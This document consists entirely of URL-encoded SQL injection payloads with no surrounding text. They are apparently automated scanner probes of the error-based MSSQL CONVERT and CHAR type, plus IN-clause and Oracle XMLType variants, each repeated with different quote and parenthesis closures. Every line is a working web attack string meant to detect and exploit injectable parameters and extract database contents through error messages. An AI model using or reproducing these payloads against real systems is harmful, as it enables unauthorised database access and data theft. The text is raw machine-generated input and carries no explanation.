-8805%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -5837%27%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27JNOa%27%3D%27JNOa -4722%27%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27GXZl%27%3D%27GXZl -3051%27%29%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27bHcT%27%3D%27bHcT -1999%27%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27egBP%27%3D%27egBP -8872%27%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27pxYD%27%20LIKE%20%27pxYD -7736%27%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27ujiU%27%20LIKE%20%27ujiU -7937%27%29%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27GDVh%27%20LIKE%20%27GDVh -2324%27%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27UsSp%27%20LIKE%20%27UsSp -6972%22%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22Vkxp%22%3D%22Vkxp -9628%22%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22dJFP%22%3D%22dJFP -1865%22%29%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22zSmw%22%3D%22zSmw -8992%22%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22FdTt%22%3D%22FdTt -2167%22%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22BlxK%22%20LIKE%20%22BlxK -4064%22%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22TRov%22%20LIKE%20%22TRov -8585%22%29%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22CQZP%22%20LIKE%20%22CQZP -8386%22%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22caYx%22%20LIKE%20%22caYx -8870%29%20WHERE%208588%3D8588%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -3860%27%29%20WHERE%204144%3D4144%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -6366%27%20WHERE%207803%3D7803%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -2815%22%20WHERE%208379%3D8379%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -7811%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -5022%27%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -2587%27%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -6029%22%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -3851%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%286508%3D6508 -6467%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%284439%3D4439 -7149%29%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%285032%3D5032 -6802%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -7384%27%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27HcLs%27%3D%27HcLs -5324%27%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27nacO%27%3D%27nacO -6351%27%29%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27HCmk%27%3D%27HCmk -5739%27%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27vJHS%27%3D%27vJHS -3786%27%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27rSro%27%20LIKE%20%27rSro -8980%27%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27FYMz%27%20LIKE%20%27FYMz -1651%27%29%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27kawU%27%20LIKE%20%27kawU -8615%27%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27pciG%27%20LIKE%20%27pciG -6279%22%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22RfYK%22%3D%22RfYK -6194%22%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22VyVF%22%3D%22VyVF -4173%22%29%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22jWGN%22%3D%22jWGN -4382%22%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22nLoa%22%3D%22nLoa -2899%22%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22PJAo%22%20LIKE%20%22PJAo -1770%22%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22JqrH%22%20LIKE%20%22JqrH -7848%22%29%29%29%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22KbLX%22%20LIKE%20%22KbLX -1996%22%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22HIJf%22%20LIKE%20%22HIJf -2849%29%20WHERE%205814%3D5814%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -7279%27%29%20WHERE%205161%3D5161%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -5907%27%20WHERE%202258%3D2258%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -7466%22%20WHERE%209267%3D9267%20OR%209203%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289203%3D9203%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -1649%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1711%27%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8101%27%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -4460%22%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -6197%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%281566%3D1566 -5402%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%284289%3D4289 -5112%29%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%284407%3D4407 -4507%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1340%27%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27GsYK%27%3D%27GsYK -1402%27%29%29%20OR%205134%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285134%3D5134%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27xqIL%27%3D%27xqIL 